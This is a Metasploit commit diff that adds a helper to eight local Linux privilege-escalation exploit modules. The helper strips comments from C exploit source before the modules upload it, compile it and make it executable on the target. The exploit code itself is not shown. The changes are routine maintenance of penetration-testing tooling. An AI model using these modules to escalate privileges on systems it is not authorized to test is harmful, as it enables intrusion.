Land #11135, strip comments from source code before uploading it to the target

4.x
Brent Cook 2018-12-17 21:23:29 -06:00 committed by Metasploit
parent 183ad8f842
commit a9f6c81aa8
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
8 changed files with 41 additions and 9 deletions

View File

@ -115,6 +115,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file)
end
@ -211,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('chocobo_root.c')
upload_and_compile executable_path, strip_comments(exploit_data('chocobo_root.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('chocobo_root')

View File

@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file)
end
@ -201,7 +205,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('poc.c')
upload_and_compile executable_path, strip_comments(exploit_data('poc.c'))
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'

View File

@ -131,6 +131,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file)
end
@ -214,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
upload_and_compile executable_path, strip_comments(exploit_data('exploit.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')

View File

@ -102,6 +102,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)
end
@ -196,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Local
@executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile @executable_path, exploit_data('RationalLove.c')
upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx @executable_path, exploit_data('RationalLove')

View File

@ -119,6 +119,10 @@ class MetasploitModule < Msf::Exploit::Local
chmod path, 0755
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file)
end
@ -213,8 +217,8 @@ class MetasploitModule < Msf::Exploit::Local
subshell_path = "#{base_dir}/#{subshell_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c')
upload_and_compile subshell_path, exploit_data('subshell.c')
upload_and_compile subuid_shell_path, strip_comments(exploit_data('subuid_shell.c'))
upload_and_compile subshell_path, strip_comments(exploit_data('subshell.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out')

View File

@ -103,6 +103,10 @@ class MetasploitModule < Msf::Exploit::Local
register_file_for_cleanup path
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file)
end
@ -169,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('rds-fail.c')
upload_and_compile executable_path, strip_comments(exploit_data('rds-fail.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
arch = kernel_hardware

View File

@ -89,6 +89,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', file)
end
@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('recvmmsg.c')
upload_and_compile executable_path, strip_comments(exploit_data('recvmmsg.c'))
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'

View File

@ -108,6 +108,10 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{path}"
end
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
end
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file)
end
@ -198,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Local
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
upload_and_compile executable_path, strip_comments(exploit_data('exploit.c'))
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')